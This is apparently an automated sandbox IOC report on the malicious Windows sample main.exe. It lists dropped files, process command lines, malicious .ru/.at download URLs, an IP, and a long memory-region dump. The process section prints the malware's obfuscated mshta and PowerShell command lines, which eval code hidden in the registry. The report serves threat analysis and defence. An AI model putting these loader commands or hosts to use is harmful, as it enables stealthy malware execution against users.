IOC Report
main.exe

loading gif

Files

File Path
Type
Category
Malicious
main.exe
PE32 executable (GUI) Intel 80386, for MS Windows
initial sample
malicious
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1b5r1h15.c2u.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gmpv3qo3.pur.ps1
very short file (no magic)
dropped

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\main.exe
C:\Users\user\Desktop\main.exe
malicious
C:\Windows\System32\mshta.exe
C:\Windows\System32\mshta.exe" "about:<hta:application><script>W6wy='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(W6wy).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fuuocwpse -value gp; new-alias -name aedsorw -value iex; aedsorw ([System.Text.Encoding]::ASCII.GetString((fuuocwpse "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
http://iujdhsndjfks.ru/uploaded/0zAp8Z1aE71wHoG9Fv8_2FN/P5uvIi7Lt1/EUmOwLMnjKYCw_2FE/5zk0aaz4yuo7/QTL_2FQEnly/Ec4VWBQYtx71qy/L2HNqAA4G4E5jKKRFVoEW/6ZRPruxEfWT04B4X/RInLDZAh2OnshBS/GAJBFuggBWOl74tiGq/C8U0bIGcG/njcGKLS7Hmxx_2FqYkMA/wXBdKE71rJ0_2BRnJ6T/_2FFCjuDuuyiRkDgNc2F1X/OAukSD8RvE3GZ/wJ754QUV/KLEyROfHTWgoSzopEA1Myxw/SpguZOW_2F2nhfCY/8gj9M.pct
134.0.118.203
malicious
http://iujdhsndjfks.ru/uploaded/WyfwvLfSP6ng/qNwqPjDNV2y/OxJbU5TVCmFtCl/_2FmMGc0UP7xWlc4RHHm3/VkwOuHDTa4HSnc69/VTjN3cHS8admcsl/lF9YNNHT37IEBsIIb1/rPNHaRLKA/yV_2FpGJiuj5msF0n5k_/2B4wsxqrXszPC5OOTPn/esejfHBxrg5go2pgH4ag55/PJJdIY_2BXhg2/Jq5vcK1p/UgH0h5yEg5hXvdYJIEh70Vq/TQwvIFJaVN/s_2BVc_2FBWfsAcv7/_2BTZLbFDlWX/SnOSHCR0HAx/WLEPxneCpL/KSqopsC3x9/C.pct
134.0.118.203
malicious
http://iujdhsndjfks.ru/uploaded/j_2B4a8tc2jahOFa/QsOHICIXeKBm7Eu/BNx3p_2F2GoxX0cDqV/bsIcjyFz7/k_2BDS2eH2WFjOwUKnxF/cxRvetg60qsvZC3x78Y/lD8NfOdFnkiGuhR8EOmhwP/zT8fuhrHfJH2d/Ofv40l9W/oihnf9hyrxXMRyhNEU3WQZX/uHKMLk6j9C/xMwWNaKtBn_2BWbOV/iD6PRhU2TNKW/6JAfLIVGbXa/piHFabYjkWkLuD/5eut_2FYnEz3uc4kygTTM/g0YmfFvzjqwqIpvd/2xgKiml2FkDoBfu/2RWlPv_2/Bhf.pct
134.0.118.203
malicious
http://iujdhsndjfks.ru/
unknown
http://nuget.org/NuGet.exe
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://iujdhsndjfks.ru/uploaded/0zAp8Z1aE71wHoG9Fv8_2FN/P5uvIi7Lt1/EUmOwLMnjKYCw_2FE/5zk0aaz4yuo7/QT
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
http://iujdhsndjfks.ru/uploaded/j_2B4a8tc2jahOFa/QsOHICIXeKBm7Eu/BNx3p_2F2GoxX0cDqV/bsIcjyFz7/k_2BDS
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
http://lentaphoto.at/uploaded/YLQQ1pvNQgsiX0/6uEpUTz0reRtkFusB_2Bb/kfn6D0FsL9WVZQdI/aUDJFCy515UVsdg/
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://github.com/Pester/Pester
unknown
http://iujdhsndjfks.ru/uploaded/WyfwvLfSP6ng/qNwqPjDNV2y/OxJbU5TVCmFtCl/_2FmMGc0UP7xWlc4RHHm3/VkwOuH
unknown
There are 8 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
iujdhsndjfks.ru
134.0.118.203
malicious
lentaphoto.at
unknown
malicious

IPs

IP
Domain
Country
Malicious
134.0.118.203
iujdhsndjfks.ru
Russian Federation
malicious

Memdumps

Base Address
Regiontype
Protect
Malicious
112F000
heap
page read and write
malicious
14A8000
heap
page read and write
malicious
14A8000
heap
page read and write
malicious
14A8000
heap
page read and write
malicious
1429000
heap
page read and write
malicious
CB9000
heap
page read and write
malicious
14A8000
heap
page read and write
malicious
14A8000
heap
page read and write
malicious
14A8000
heap
page read and write
malicious
14A8000
heap
page read and write
malicious
14A8000
heap
page read and write
malicious
14A8000
heap
page read and write
malicious
13AA000
heap
page read and write
malicious
14A8000
heap
page read and write
malicious
12AC000
heap
page read and write
malicious
870000
heap
page read and write
1C0C1D83000
heap
page read and write
1FE4B039000
heap
page read and write
1C8C4112000
heap
page read and write
8C39DFF000
stack
page read and write
24B9F024000
heap
page read and write
265A8090000
trusted library allocation
page read and write
7FFBAE900000
trusted library allocation
page read and write
10CA7FB000
stack
page read and write
7FFBAE880000
trusted library allocation
page read and write
24B9F04E000
heap
page read and write
265C03F0000
heap
page read and write
265A64B0000
trusted library allocation
page read and write
20CBD402000
trusted library allocation
page read and write
8C39BFB000
stack
page read and write
20E3583C000
heap
page read and write
265C0840000
heap
page read and write
265C0839000
heap
page read and write
20E36122000
heap
page read and write
20E3583C000
heap
page read and write
265C085D000
heap
page read and write
1B82A64F000
heap
page read and write
265B810C000
trusted library allocation
page read and write
20E3598E000
heap
page read and write
1C0C1D5E000
heap
page read and write
20CBCE58000
heap
page read and write
20E35865000
heap
page read and write
7FB000
heap
page read and write
265A8090000
trusted library allocation
page read and write
1C8C4142000
heap
page read and write
7EA000
heap
page read and write
1FE4AE70000
heap
page read and write
2852E550000
remote allocation
page read and write
1FB1FA53000
heap
page read and write
172BE002000
trusted library allocation
page read and write
1C0C1D93000
heap
page read and write
265A9B2F000
trusted library allocation
page read and write
A94D67C000
stack
page read and write
1C0C1DBB000
heap
page read and write
20CBCE00000
heap
page read and write
265A8C64000
trusted library allocation
page read and write
1C0C1DAA000
heap
page read and write
265A8070000
trusted library allocation
page read and write
20E357F0000
heap
page read and write
1C0C1D9B000
heap
page read and write
104F000
stack
page read and write
1C0C1D2B000
heap
page read and write
265A8450000
trusted library allocation
page read and write
20E35813000
heap
page read and write
265A9FB8000
trusted library allocation
page read and write
1C8C621A000
trusted library allocation
page read and write
24B9F084000
heap
page read and write
24B9EFF0000
trusted library allocation
page read and write
51B1E7E000
stack
page read and write
20CBCE60000
heap
page read and write
265A65C0000
heap
page readonly
6D1000
unclassified section
page execute read
265A6500000
heap
page read and write
9D000
stack
page read and write
9338DAE000
stack
page read and write
24B9F06F000
heap
page read and write
BA0E37F000
stack
page read and write
1C0C1DAF000
heap
page read and write
24B9F065000
heap
page read and write
24B9F020000
heap
page read and write
1C0C1D9B000
heap
page read and write
BA0E87E000
stack
page read and write
108D000
stack
page read and write
265A8CA9000
trusted library allocation
page read and write
3760000
heap
page read and write
1C0C1D13000
heap
page read and write
265C04BC000
heap
page read and write
10C9EDB000
stack
page read and write
265C0445000
heap
page read and write
1C8C3994000
heap
page read and write
172BD835000
heap
page read and write
82414F7000
stack
page read and write
265A6470000
trusted library section
page read and write
1FE4B102000
heap
page read and write
265A8FBA000
trusted library allocation
page read and write
265C0855000
heap
page read and write
1C8C4147000
heap
page read and write
1FB1FA77000
heap
page read and write
1C0C1D1C000
heap
page read and write
7FFBAE980000
trusted library allocation
page read and write
265A7EC8000
heap
page read and write
1FE4AED0000
heap
page read and write
1C0C1DCB000
heap
page read and write
1C0C1DCA000
heap
page read and write
1C0C1D93000
heap
page read and write
1B82AB90000
trusted library allocation
page read and write
265A8090000
trusted library allocation
page read and write
9339478000
stack
page read and write
1C8C412B000
heap
page read and write
265A8070000
heap
page execute and read and write
1B82A3D0000
heap
page read and write
265A8090000
trusted library allocation
page read and write
82415FE000
stack
page read and write
1C8C40F0000
heap
page read and write
A94D57E000
stack
page read and write
BA0E6FA000
stack
page read and write
1C0C1D39000
heap
page read and write
20E36102000
heap
page read and write
1C0C1D6F000
heap
page read and write
2852CA46000
heap
page read and write
2852CA02000
heap
page read and write
7FFBAE8D0000
trusted library allocation
page read and write
265A9D56000
trusted library allocation
page read and write
265C083E000
heap
page read and write
265A9D41000
trusted library allocation
page read and write
682297D000
stack
page read and write
2852CA2A000
heap
page read and write
172BD829000
heap
page read and write
265B80C1000
trusted library allocation
page read and write
265A8094000
trusted library allocation
page read and write
1C0C1DAF000
heap
page read and write
59B000
stack
page read and write
3670000
trusted library allocation
page read and write
20E36200000
heap
page read and write
7FFBAE8E0000
trusted library allocation
page read and write
1C0C1DAF000
heap
page read and write
1C8C410F000
heap
page read and write
824204F000
stack
page read and write
265A651B000
heap
page read and write
14AC000
heap
page read and write
366E000
trusted library allocation
page read and write
1FE4B030000
heap
page read and write
93393F7000
stack
page read and write
1C0C1DC8000
heap
page read and write
1C8C3E52000
heap
page read and write
1C0C1DB2000
heap
page read and write
265A9B5A000
trusted library allocation
page read and write
265A8090000
trusted library allocation
page read and write
1C0C1D84000
heap
page read and write
1C0C1D55000
heap
page read and write
68226FE000
stack
page read and write
19C000
stack
page read and write
1C8C3E65000
heap
page read and write
2852CB18000
heap
page read and write
A94CAFC000
stack
page read and write
1C0C1D8A000
heap
page read and write
8C3968C000
stack
page read and write
7DF47C080000
trusted library allocation
page execute and read and write
817000
heap
page read and write
265C0860000
heap
page read and write
1456000
heap
page read and write
1C8C4147000
heap
page read and write
172BD902000
heap
page read and write
400000
unkown
page readonly
1B82A6BA000
heap
page read and write
265C0500000
trusted library allocation
page read and write
20E35882000
heap
page read and write
172BD7C0000
heap
page read and write
20E35F70000
trusted library allocation
page read and write
1C0C35B0000
heap
page read and write
1C8C6211000
trusted library allocation
page read and write
20E36122000
heap
page read and write
20CBD3A0000
trusted library allocation
page read and write
20CBCBD0000
heap
page read and write
BFFC2FE000
stack
page read and write
172BDF50000
remote allocation
page read and write
1C0C1D81000
heap
page read and write
7FFBAE8B0000
trusted library allocation
page read and write
844000
heap
page read and write
1C0C1C70000
heap
page read and write
1C0C1D9F000
heap
page read and write
1FB1FA5A000
heap
page read and write
7FF000
heap
page read and write
172BD7F0000
trusted library allocation
page read and write
1C0C1D8D000
heap
page read and write
265C04AC000
heap
page read and write
2852E550000
remote allocation
page read and write
2852CA62000
heap
page read and write
265C0834000
heap
page read and write
20E36223000
heap
page read and write
BFFC1FE000
stack
page read and write
82419FF000
stack
page read and write
1C0C1D8C000
heap
page read and write
172BD840000
heap
page read and write
265A9D39000
trusted library allocation
page read and write
1C8C4139000
heap
page read and write
20E36230000
heap
page read and write
20E361B0000
heap
page read and write
265A6480000
trusted library section
page read and write
1FE4B052000
heap
page read and write
265C0860000
heap
page read and write
1B82AC02000
heap
page read and write
3718000
trusted library allocation
page read and write
265A657B000
heap
page read and write
1C8C4147000
heap
page read and write
1C8C4142000
heap
page read and write
1B82A629000
heap
page read and write
265A9B37000
trusted library allocation
page read and write
1FB1FB02000
heap
page read and write
A94D27E000
stack
page read and write
265A8090000
trusted library allocation
page read and write
5C5000
heap
page read and write
172BD802000
heap
page read and write
20E36154000
heap
page read and write
24B9F07D000
heap
page read and write
1C8C4139000
heap
page read and write
1FB1FA67000
heap
page read and write
93392FF000
stack
page read and write
1C8C4139000
heap
page read and write
265A9AE0000
trusted library allocation
page read and write
1FB1FA3D000
heap
page read and write
395F000
stack
page read and write
1C0C1DB2000
heap
page read and write
265A80A5000
heap
page read and write
265C047C000
heap
page read and write
1C0C1D09000
heap
page read and write
365F000
stack
page read and write
20E35885000
heap
page read and write
1C0C3644000
heap
page read and write
2852CB02000
heap
page read and write
D5E000
trusted library allocation
page read and write
10CA67B000
stack
page read and write
BA0E5FF000
stack
page read and write
7FFBAE875000
trusted library allocation
page read and write
24B9EE80000
heap
page read and write
265A8090000
trusted library allocation
page read and write
E17000
trusted library allocation
page read and write
2852CA3D000
heap
page read and write
1B82A6CB000
heap
page read and write
75E000
stack
page read and write
2852CA00000
heap
page read and write
265C0464000
heap
page read and write
1C0C364D000
heap
page read and write
24B9F075000
heap
page read and write
265A62C0000
heap
page read and write
1C8C4139000
heap
page read and write
BFFC4FF000
stack
page read and write
7FFBAE860000
trusted library allocation
page read and write
1C8C4147000
heap
page read and write
2852CB1B000
heap
page read and write
35219FE000
stack
page read and write
265B832B000
trusted library allocation
page read and write
1C0C1DA3000
heap
page read and write
BFFC3FD000
stack
page read and write
1C0C1D88000
heap
page read and write
33DA000
stack
page read and write
20E359E5000
heap
page read and write
265A8090000
trusted library allocation
page read and write
3660000
trusted library allocation
page read and write
682247B000
stack
page read and write
24B9F048000
heap
page read and write
24B9EE90000
heap
page read and write
265A8CD4000
trusted library allocation
page read and write
1C0C1D3A000
heap
page read and write
1B82A686000
heap
page read and write
265C0912000
heap
page read and write
10CAAFC000
stack
page read and write
BFFC0FD000
stack
page read and write
265A6450000
heap
page read and write
2852C9A0000
heap
page read and write
1C8C4143000
heap
page read and write
265A6508000
heap
page read and write
1FB1F790000
heap
page read and write
24B9F059000
heap
page read and write
68229FF000
stack
page read and write
265A8090000
trusted library allocation
page read and write
BFFC5FF000
stack
page read and write
7FFBAE970000
trusted library allocation
page read and write
265C0810000
heap
page read and write
682287F000
stack
page read and write
1C8C4142000
heap
page read and write
1B82A63D000
heap
page read and write
265A64C0000
heap
page read and write
1C8C3C60000
heap
page read and write
870000
heap
page read and write
1C0C1C9D000
heap
page read and write
24B9F068000
heap
page read and write
1FB1FA8D000
heap
page read and write
1C8C412B000
heap
page read and write
2852CB13000
heap
page read and write
24B9F06A000
heap
page read and write
265A8BFE000
trusted library allocation
page read and write
5C0000
heap
page read and write
1C8C4139000
heap
page read and write
265A9B40000
trusted library allocation
page read and write
1C8C3E65000
heap
page read and write
1C8C4130000
heap
page read and write
870000
heap
page read and write
1C8C3E65000
heap
page read and write
2852C940000
heap
page read and write
1FB1FA64000
heap
page read and write
265C05C0000
heap
page execute and read and write
1C0C1D7B000
heap
page read and write
1B82AD3A000
heap
page read and write
1C0C1D81000
heap
page read and write
406000
unkown
page readonly
1C0C1D09000
heap
page read and write
1C0C1D8A000
heap
page read and write
1C0C1DC8000
heap
page read and write
20CBCBE0000
heap
page read and write
6822C7D000
stack
page read and write
1C8C6235000
trusted library allocation
page read and write
7FFBAE7E2000
trusted library allocation
page read and write
20E361C6000
heap
page read and write
933A083000
stack
page read and write
BFFBFFB000
stack
page read and write
BA0E07B000
stack
page read and write
A94D37C000
stack
page read and write
1C8C3E50000
heap
page read and write
1C0C1D6A000
heap
page read and write
F4C000
stack
page read and write
20E36190000
heap
page read and write
10CA9FE000
stack
page read and write
20E35876000
heap
page read and write
796000
heap
page read and write
1C8C6224000
trusted library allocation
page read and write
8BE000
stack
page read and write
1C0C1DBB000
heap
page read and write
1B82AD00000
heap
page read and write
93391FF000
stack
page read and write
BA0E4F9000
stack
page read and write
1C8C3E87000
heap
page read and write
265C090A000
heap
page read and write
20E35873000
heap
page read and write
20CBCE40000
heap
page read and write
1B82A430000
heap
page read and write
1FE4B025000
heap
page read and write
3521BFF000
stack
page read and write
7FFBAE760000
trusted library allocation
page execute and read and write
1C8C4112000
heap
page read and write
265A8CBB000
trusted library allocation
page read and write
1C8C3E51000
heap
page read and write
1C0C1D8A000
heap
page read and write
1C8C4129000
heap
page read and write
7FFBAE9B0000
trusted library allocation
page read and write
24B9F03C000
heap
page read and write
24B9F061000
heap
page read and write
20E3616D000
heap
page read and write
24B9F060000
heap
page read and write
265A80A0000
heap
page read and write
24B9F074000
heap
page read and write
1C0C1DAF000
heap
page read and write
1C8C410F000
heap
page read and write
265C045E000
heap
page read and write
BA0E27A000
stack
page read and write
1C0C1D39000
heap
page read and write
10B0000
heap
page read and write
24B9F031000
heap
page read and write
20CBCC40000
heap
page read and write
900000
heap
page read and write
9338DEE000
stack
page read and write
24B9F022000
heap
page read and write
24B9F05A000
heap
page read and write
1C0C1D9C000
heap
page read and write
1C0C1D8A000
heap
page read and write
7FFBAE650000
trusted library allocation
page read and write
2852CA13000
heap
page read and write
265A65E0000
trusted library allocation
page read and write
1C0C1D86000
heap
page read and write
A94CEFF000
stack
page read and write
20CBCE68000
heap
page read and write
24B9F05D000
heap
page read and write
265A6542000
heap
page read and write
788000
heap
page read and write
1C0C1D6F000
heap
page read and write
3761000
heap
page read and write
24B9F057000
heap
page read and write
1C8C4142000
heap
page read and write
7FFBAE950000
trusted library allocation
page read and write
265C083D000
heap
page read and write
265C0860000
heap
page read and write
1C0C1DC8000
heap
page read and write
1C0C1D86000
heap
page read and write
24B9F058000
heap
page read and write
265A8090000
trusted library allocation
page read and write
1196000
heap
page read and write
1C8C412B000
heap
page read and write
1C8C4112000
heap
page read and write
265A8CB2000
trusted library allocation
page read and write
24B9F041000
heap
page read and write
1C0C1C50000
heap
page read and write
1C0C1DC8000
heap
page read and write
8241BFC000
stack
page read and write
7F6000
heap
page read and write
5A0000
heap
page read and write
7FD000
heap
page read and write
38E9000
trusted library allocation
page read and write
2852CA88000
heap
page read and write
265A6710000
heap
page read and write
1429000
heap
page read and write
265C0860000
heap
page read and write
20E35913000
heap
page read and write
24B9F067000
heap
page read and write
172BD760000
heap
page read and write
24B9F802000
trusted library allocation
page read and write
265A9D4E000
trusted library allocation
page read and write
1C0C1DB2000
heap
page read and write
1C8C4129000
heap
page read and write
E09000
trusted library allocation
page read and write
1B82A613000
heap
page read and write
7FFBAE910000
trusted library allocation
page read and write
265A80FF000
trusted library allocation
page read and write
1FB1FA70000
heap
page read and write
265A8C95000
trusted library allocation
page read and write
1FB1FB13000
heap
page read and write
7FFBAE810000
trusted library allocation
page execute and read and write
1C0C1D76000
heap
page read and write
10CABFE000
stack
page read and write
1C0C1D88000
heap
page read and write
265C0510000
trusted library allocation
page read and write
2852E602000
trusted library allocation
page read and write
93390FF000
stack
page read and write
1C0C1D7B000
heap
page read and write
20E36213000
heap
page read and write
24B9F013000
heap
page read and write
BA0E47B000
stack
page read and write
D60000
trusted library allocation
page read and write
7FFBAE7F4000
trusted library allocation
page read and write
6D0000
unclassified section
page read and write
7F1000
heap
page read and write
1C0C1D9B000
heap
page read and write
265C04F0000
trusted library allocation
page read and write
20E35829000
heap
page read and write
265A8090000
trusted library allocation
page read and write
1C0C1DB2000
heap
page read and write
20E3582C000
heap
page read and write
1C0C1D83000
heap
page read and write
1C0C1C90000
heap
page read and write
6DC000
unclassified section
page readonly
1B82A64A000
heap
page read and write
20E36100000
heap
page read and write
20CBCF13000
heap
page read and write
6D9000
unclassified section
page readonly
14AB000
heap
page read and write
1C0C1DCD000
heap
page read and write
20E36002000
heap
page read and write
1C0C1DC8000
heap
page read and write
760000
heap
page read and write
2852C930000
heap
page read and write
351F000
stack
page read and write
1C0C1D10000
heap
page read and write
93396FB000
stack
page read and write
2852CA7F000
heap
page read and write
1FB1FA8A000
heap
page read and write
7FFBAE8D7000
trusted library allocation
page read and write
1C0C1D93000
heap
page read and write
3521AFA000
stack
page read and write
1C0C1DC8000
heap
page read and write
933917D000
stack
page read and write
20E359B9000
heap
page read and write
2852CB00000
heap
page read and write
82416FE000
stack
page read and write
1C0C1D2B000
heap
page read and write
309F000
stack
page read and write
1C0C1D8C000
heap
page read and write
20CBCF02000
heap
page read and write
3727000
trusted library allocation
page read and write
1C0C1CD0000
heap
page read and write
80F000
heap
page read and write
20E3588A000
heap
page read and write
1C0C1D7B000
heap
page read and write
3661000
trusted library allocation
page read and write
400000
unkown
page readonly
265A82B4000
trusted library allocation
page read and write
7FFBAE644000
trusted library allocation
page read and write
3768000
trusted library allocation
page read and write
3766000
trusted library allocation
page read and write
2852CA47000
heap
page read and write
265A80B1000
trusted library allocation
page read and write
20CBCE64000
heap
page read and write
265A8D5B000
trusted library allocation
page read and write
1C8C4139000
heap
page read and write
265C0860000
heap
page read and write
172BDF50000
remote allocation
page read and write
355E000
stack
page read and write
2852C9F0000
trusted library allocation
page read and write
1C8C4139000
heap
page read and write
1C0C1D6A000
heap
page read and write
1FE4B013000
heap
page read and write
404000
unkown
page read and write
1C0C1DB2000
heap
page read and write
20E36202000
heap
page read and write
20CBCE79000
heap
page read and write
265A6490000
trusted library allocation
page read and write
1C0C1D1F000
heap
page read and write
14A8000
heap
page read and write
1C0C1D81000
heap
page read and write
1C8C6245000
trusted library allocation
page read and write
265A8097000
trusted library allocation
page read and write
265A65D0000
heap
page read and write
682277E000
stack
page read and write
1C0C1D93000
heap
page read and write
265A8094000
trusted library allocation
page read and write
1C0C1D9B000
heap
page read and write
265A8090000
trusted library allocation
page read and write
10CA4FF000
stack
page read and write
2852CA57000
heap
page read and write
1C8C6215000
trusted library allocation
page read and write
265C0918000
heap
page read and write
1FE4B000000
heap
page read and write
51B1D7E000
stack
page read and write
1C8C412B000
heap
page read and write
265A64C9000
heap
page read and write
2852E4D0000
trusted library allocation
page read and write
52E000
stack
page read and write
1C8C4147000
heap
page read and write
24B9F056000
heap
page read and write
20E35854000
heap
page read and write
265A8070000
trusted library allocation
page read and write
172BD857000
heap
page read and write
BFFC8FF000
stack
page read and write
2852E550000
remote allocation
page read and write
1C8C4147000
heap
page read and write
24B9F06D000
heap
page read and write
1B82A713000
heap
page read and write
1C8C39AD000
heap
page read and write
1C8C4142000
heap
page read and write
1C0C1DAC000
heap
page read and write
1FB1FA54000
heap
page read and write
20E36143000
heap
page read and write
1C0C35C0000
heap
page read and write
24B9F07B000
heap
page read and write
265A9E9E000
trusted library allocation
page read and write
265A6420000
heap
page read and write
265A8F7E000
trusted library allocation
page read and write
24B9F040000
heap
page read and write
7FFBAE6FC000
trusted library allocation
page execute and read and write
20E35862000
heap
page read and write
1C0C1D2B000
heap
page read and write
1C8C412B000
heap
page read and write
51B1F7F000
stack
page read and write
1B82A600000
heap
page read and write
265A8090000
trusted library allocation
page read and write
933A0CE000
stack
page read and write
1C0C1DAF000
heap
page read and write
940000
heap
page read and write
1C0C1D73000
heap
page read and write
265C05C7000
heap
page execute and read and write
20E36227000
heap
page read and write
265C0460000
heap
page read and write
1FB1F9D0000
trusted library allocation
page read and write
7FFBAE8F0000
trusted library allocation
page read and write
1FE4B03C000
heap
page read and write
1C0C1D83000
heap
page read and write
1C8C621E000
trusted library allocation
page read and write
7FFBAE9C0000
trusted library allocation
page read and write
1C0C1D7B000
heap
page read and write
20E35F50000
trusted library allocation
page read and write
93395FF000
stack
page read and write
1C0C1DBB000
heap
page read and write
2852CA47000
heap
page read and write
7FFBAE7FC000
trusted library allocation
page read and write
3811000
trusted library allocation
page read and write
265B8395000
trusted library allocation
page read and write
7F4000
heap
page read and write
1FE4AFD0000
trusted library allocation
page read and write
1FB1FA29000
heap
page read and write
7FFBAE840000
trusted library allocation
page read and write
1C8C4129000
heap
page read and write
1C0C1DAF000
heap
page read and write
2852CA7A000
heap
page read and write
265A9B1C000
trusted library allocation
page read and write
24B9F000000
heap
page read and write
265C0843000
heap
page read and write
1FB1FA13000
heap
page read and write
7FFBAE870000
trusted library allocation
page read and write
24B9F102000
heap
page read and write
6822AFD000
stack
page read and write
1C8C39A9000
heap
page read and write
24B9F064000
heap
page read and write
1C0C1D8D000
heap
page read and write
1FE4B029000
heap
page read and write
933937A000
stack
page read and write
265C0859000
heap
page read and write
1C0C1DCD000
heap
page read and write
1C0C1D1A000
heap
page read and write
7FFBAE9D0000
trusted library allocation
page read and write
265A6715000
heap
page read and write
780000
heap
page read and write
265C047A000
heap
page read and write
1FB1FA00000
heap
page read and write
1C0C1D93000
heap
page read and write
265A8C6D000
trusted library allocation
page read and write
51B17CC000
stack
page read and write
319F000
stack
page read and write
1C0C1D80000
heap
page read and write
406000
unkown
page readonly
51B1AFE000
stack
page read and write
265C084B000
heap
page read and write
265C046E000
heap
page read and write
7FFBAE640000
trusted library allocation
page read and write
1C8C4142000
heap
page read and write
265A650A000
heap
page read and write
9338D25000
stack
page read and write
172BD800000
heap
page read and write
20E35790000
heap
page read and write
1C8C6290000
trusted library allocation
page execute
824214B000
stack
page read and write
7FFBAE7F1000
trusted library allocation
page read and write
1C8C4147000
heap
page read and write
1C0C1DCC000
heap
page read and write
265A64FB000
heap
page read and write
1C0C1D9F000
heap
page read and write
1C0C1D99000
heap
page read and write
8C39EFE000
stack
page read and write
7DE000
heap
page read and write
7FFBAE920000
trusted library allocation
page read and write
7FFBAE930000
trusted library allocation
page read and write
1C8C3990000
heap
page read and write
1C0C1D86000
heap
page read and write
D38000
heap
page read and write
A94D17F000
stack
page read and write
1B82AD12000
heap
page read and write
1C0C1D1E000
heap
page read and write
1B82A648000
heap
page read and write
7FFBAE822000
trusted library allocation
page read and write
8FE000
stack
page read and write
1C0C1B10000
heap
page read and write
7FFBAE8A0000
trusted library allocation
page read and write
341E000
stack
page read and write
265A8C97000
trusted library allocation
page read and write
1C0C1D9E000
heap
page read and write
1C8C6217000
trusted library allocation
page read and write
2852E490000
trusted library allocation
page read and write
1C0C1D7B000
heap
page read and write
352148B000
stack
page read and write
265A9BE3000
trusted library allocation
page read and write
35218FE000
stack
page read and write
1B82A702000
heap
page read and write
BA0E97F000
stack
page read and write
24B9F07E000
heap
page read and write
1FE4B046000
heap
page read and write
BFFC6FE000
stack
page read and write
7FFBAE653000
trusted library allocation
page read and write
7FFBAE9A0000
trusted library allocation
page read and write
1C8C6230000
trusted library allocation
page read and write
20CBCF00000
heap
page read and write
7F9000
heap
page read and write
7FFBAE643000
trusted library allocation
page execute and read and write
1C8C412B000
heap
page read and write
1C0C1D76000
heap
page read and write
20E3588D000
heap
page read and write
7FFBAE830000
trusted library allocation
page execute and read and write
172BDF50000
remote allocation
page read and write
2852CA56000
heap
page read and write
7FFBAE700000
trusted library allocation
page execute and read and write
1C8C414B000
heap
page read and write
24B9F05C000
heap
page read and write
A94D47D000
stack
page read and write
32DD000
stack
page read and write
1C0C1D93000
heap
page read and write
24B9F05E000
heap
page read and write
10CA77D000
stack
page read and write
1F0000
trusted library allocation
page read and write
7FFBAE990000
trusted library allocation
page read and write
20CBCE02000
heap
page read and write
265C0844000
heap
page read and write
10CA8FC000
stack
page read and write
6822B7E000
stack
page read and write
1C0C1DAB000
heap
page read and write
265A9AF4000
trusted library allocation
page read and write
381F000
trusted library allocation
page read and write
933A14E000
stack
page read and write
265A656F000
heap
page read and write
1C8C4139000
heap
page read and write
2852C9D0000
trusted library allocation
page read and write
10CA2FC000
stack
page read and write
7FFBAE8C0000
trusted library allocation
page read and write
1C0C1D88000
heap
page read and write
1C0C1D9B000
heap
page read and write
14AB000
heap
page read and write
20CBCE13000
heap
page read and write
24B9F055000
heap
page read and write
1C0C1D55000
heap
page read and write
1FE4B002000
heap
page read and write
1C0C1DA2000
heap
page read and write
5D0000
trusted library allocation
page read and write
265A8452000
trusted library allocation
page read and write
8241CFF000
stack
page read and write
3830000
trusted library allocation
page read and write
7FFBAE960000
trusted library allocation
page read and write
1C0C35B4000
heap
page read and write
7FFBAE6F6000
trusted library allocation
page read and write
1C8C410F000
heap
page read and write
6DA000
unclassified section
page read and write
870000
heap
page read and write
51B1C7E000
stack
page read and write
401000
unkown
page execute read
329B000
stack
page read and write
93394F8000
stack
page read and write
265A6620000
heap
page execute and read and write
1C8C414A000
heap
page read and write
1C0C1D86000
heap
page read and write
4F0000
trusted library allocation
page read and write
1C0C1D9F000
heap
page read and write
1B82A3C0000
heap
page read and write
933967F000
stack
page read and write
1C0C1D70000
heap
page read and write
401000
unkown
page execute read
1C0C1C96000
heap
page read and write
10CA5FF000
stack
page read and write
1C8C4147000
heap
page read and write
20E35780000
heap
page read and write
38DB000
trusted library allocation
page read and write
1C0C1D7B000
heap
page read and write
265A99BA000
trusted library allocation
page read and write
265B8118000
trusted library allocation
page read and write
265C04F0000
trusted library allocation
page read and write
1C0C1D8C000
heap
page read and write
20E361BC000
heap
page read and write
265C0830000
heap
page read and write
7FFBAE940000
trusted library allocation
page read and write
172BD813000
heap
page read and write
1C0C1D99000
heap
page read and write
933927E000
stack
page read and write
933957F000
stack
page read and write
265A6400000
heap
page read and write
BA0E7FE000
stack
page read and write
1C0C1DBB000
heap
page read and write
402000
unkown
page readonly
1FB1F7A0000
heap
page read and write
1FE4B802000
trusted library allocation
page read and write
8C39CFB000
stack
page read and write
265A8051000
trusted library allocation
page read and write
172BD750000
heap
page read and write
14A8000
heap
page read and write
20E35868000
heap
page read and write
24B9F062000
heap
page read and write
7FFBAE6F0000
trusted library allocation
page read and write
1FB1F800000
heap
page read and write
265A8054000
trusted library allocation
page read and write
51B1A7E000
stack
page read and write
BFFBBAB000
stack
page read and write
265A6660000
trusted library allocation
page read and write
A94D07F000
stack
page read and write
265A8FB7000
trusted library allocation
page read and write
7FFBAE890000
trusted library allocation
page read and write
24B9F042000
heap
page read and write
1C8C3E52000
heap
page read and write
24B9F063000
heap
page read and write
933907F000
stack
page read and write
1C8C40E0000
heap
page read and write
1C0C1D8C000
heap
page read and write
2852CA57000
heap
page read and write
7FFBAE64D000
trusted library allocation
page execute and read and write
1C8C4139000
heap
page read and write
5C7000
heap
page read and write
402000
unkown
page readonly
265A8060000
